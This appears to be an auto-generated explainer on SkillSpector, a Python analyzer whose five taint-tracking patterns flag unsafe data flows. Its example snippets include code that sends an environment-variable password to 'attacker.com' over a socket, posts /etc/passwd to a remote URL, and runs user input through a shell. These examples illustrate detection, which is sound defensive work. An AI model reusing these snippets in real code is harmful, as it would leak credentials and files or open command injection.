SkillSpector Taint Tracking Patterns (TT1-TT5): A Complete Security Analysis
SkillSpector implements five behavioral taint-tracking patterns (TT1-TT5) that detect unsafe data flows from sources like environment variables and user input to sinks like network outputs and code execution, with severity ratings ranging from Medium (0.65) to Critical (0.90).
NVIDIA's SkillSpector is a Python security analyzer that identifies vulnerable data flows through behavioral taint tracking. The SkillSpector taint tracking patterns categorize how untrusted data propagates from sources to sinks, enabling detection of credential leaks, data exfiltration, and remote code execution vulnerabilities in Python source code.
The Five SkillSpector Taint Tracking Patterns
According to the source code in src/skillspector/nodes/analyzers/pattern_defaults.py (lines 95-100), SkillSpector defines five distinct taint-tracking patterns based on the source-sink combination and propagation path:
- TT1 — Direct Source-to-Sink Flow: Fires when a source call is used directly as an argument to a sink call (e.g.,
requests.post(..., data=os.getenv("KEY"))). Severity: High (0.80). - TT2 — Variable-Mediated Taint Flow: Detects when source data is first assigned to a variable or container before reaching a sink (e.g.,
secret = os.getenv("K"); requests.post(secret)). Severity: Medium (0.65). - TT3 — Credential Exfiltration Flow: Specifically identifies when credential-type sources (
os.getenv,os.environ) flow to network-output sinks (requests.post,socket.send). Severity: Critical (0.90). - TT4 — File-Data Exfiltration Flow: Triggers when file contents read from disk flow to network-output sinks. Severity: High (0.80).
- TT5 — External Input → Execution Flow: Detects external input (network requests or
input()) flowing to execution sinks (exec,subprocess.run). Severity: Critical (0.90).
How the Behavioral Taint Tracking Analyzer Works
The analyzer implementation in src/skillspector/nodes/analyzers/behavioral_taint_tracking.py processes Python files through a multi-stage pipeline to detect these patterns.
Source and Sink Catalogs
The analyzer maintains static sets of recognized sources and sinks:
- Sources:
_CREDENTIAL_SOURCES(environment variables),_FILE_READ_SOURCES(file operations),_NETWORK_INPUT_SOURCES(network requests), and_USER_INPUT_SOURCES(input()calls). - Sinks:
_NETWORK_OUTPUT_SINKS(HTTP requests, sockets),_EXEC_SINKS(code execution), and_FILE_WRITE_SINKS(file operations).
AST Parsing and Taint Propagation
Each file is parsed using ast.parse and examined node-by-node. When an ast.Assign node contains a source call, the left-hand side variables are marked as _TaintedVar. Taint propagates through literals, containers, and f-strings.
Detection and Rule Selection
For every function call matching a sink name, the analyzer checks:
- Direct flows: Via
_find_nested_sourcesto identify source calls passed directly as arguments. - Indirect flows: Via
_find_tainted_names_in_argsto detect previously tainted variables in argument lists.
The _pick_rule function (lines 80-88) maps the source-sink pair to the appropriate TT-ID based on whether the flow is direct or mediated. Findings are emitted via _emit (lines 15-33) as AnalyzerFinding objects containing the rule ID, line number, confidence score, and severity.
Code Examples for Each Taint Pattern
TT1: Direct Source-to-Sink Flow
When a credential source is passed directly to a network sink, TT1 fires with high confidence:
import os
import requests
# Direct flow: credential source → network output sink
requests.post("https://example.com/collect", data=os.getenv("API_KEY"))
Running SkillSpector on this code reports TT1 because os.getenv (source) is passed directly to requests.post (sink).
TT2: Variable-Mediated Taint Flow
TT2 detects taint propagation through intermediate variables:
import os
import requests
# Variable-mediated flow
secret = os.getenv("API_KEY") # source assignment
payload = {"token": secret} # taint propagates to container
requests.post("https://example.com/collect", json=payload) # sink
The analyzer marks secret as tainted during assignment, tracks its propagation into payload, and reports TT2 when the tainted data reaches the sink.
TT3: Credential Exfiltration Flow
TT3 specifically targets credential theft via network exfiltration:
import os
import socket
# Credential exfiltration: environment variable → network socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("attacker.com", 9999))
sock.send(os.environ["DB_PASSWORD"].encode())
This triggers TT3 (Critical/0.90) because os.environ (credential source) flows to socket.send (network output).
TT4: File-Data Exfiltration Flow
TT4 identifies sensitive file content being sent over the network:
import requests
with open("/etc/passwd", "r") as f:
data = f.read()
# File data exfiltration
requests.post("https://example.com/upload", data=data)
The flow from file read to network output generates a TT4 finding.
TT5: External Input to Execution Flow
TT5 detects command injection vulnerabilities:
import subprocess
# External input (user) → execution sink
user_cmd = input("Enter command: ")
subprocess.run(user_cmd, shell=True) # exec sink
Because input() is a recognized external-input source and subprocess.run is an execution sink, this triggers TT5 (Critical/0.90).
Key Implementation Files
The taint-tracking functionality is distributed across these modules:
src/skillspector/nodes/analyzers/behavioral_taint_tracking.py: Core analyzer containingnode(state)(entry point, lines 4-5) and_analyze_python(lines 101-200), which implements the AST traversal and taint propagation logic.src/skillspector/nodes/analyzers/pattern_defaults.py: Registry of pattern definitions and remediation guidance for TT1-TT5 (lines 95-100).src/skillspector/nodes/analyzers/common.py: Utility functions for import-alias handling and name resolution used during taint analysis.src/skillspector/models.py: Definition ofAnalyzerFinding,Severity, and other data models emitted by the analyzer.
Summary
- SkillSpector defines five taint-tracking patterns (TT1-TT5) to categorize unsafe data flows in Python code.
- TT1 and TT2 distinguish between direct and variable-mediated flows, while TT3-TT5 identify specific high-risk combinations (credentials, file data, and code execution).
- The analyzer uses AST parsing to track taint from predefined sources to sinks, with confidence scores ranging from 0.65 (Medium) to 0.90 (Critical).
- Implementation resides primarily in
behavioral_taint_tracking.py, with pattern definitions inpattern_defaults.py.
Frequently Asked Questions
What is the difference between TT1 and TT2 in SkillSpector?
TT1 (Direct Source-to-Sink) fires when a source function is called directly inside a sink function's arguments, while TT2 (Variable-Mediated) detects when source data is stored in a variable or container before reaching a sink. TT1 has higher confidence (0.80) than TT2 (0.65) because direct flows lack sanitization opportunities that variable assignment might provide.
How does SkillSpector determine the severity of a taint tracking finding?
Severity is determined by the source-sink combination defined in _pick_rule (lines 80-88 of behavioral_taint_tracking.py). Credential exfiltration (TT3) and external input to execution (TT5) receive Critical severity (0.90) due to their high security impact, while variable-mediated flows (TT2) receive Medium severity (0.65) because indirect propagation may include sanitization steps.
Can SkillSpector track taint through complex data structures?
Yes. According to the analyzer implementation, taint propagates through literals, containers (lists, dictionaries), and f-strings. When a tainted variable is assigned to a container like payload = {"token": secret}, the analyzer tracks the taint into the container and reports the appropriate pattern when the container is passed to a sink.
Where are the taint tracking patterns defined in the SkillSpector codebase?
The pattern definitions, including names, descriptions, and remediation guidance for TT1-TT5, are stored in src/skillspector/nodes/analyzers/pattern_defaults.py at lines 95-100. The detection logic that maps source-sink pairs to these pattern IDs is implemented in src/skillspector/nodes/analyzers/behavioral_taint_tracking.py within the _pick_rule function.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →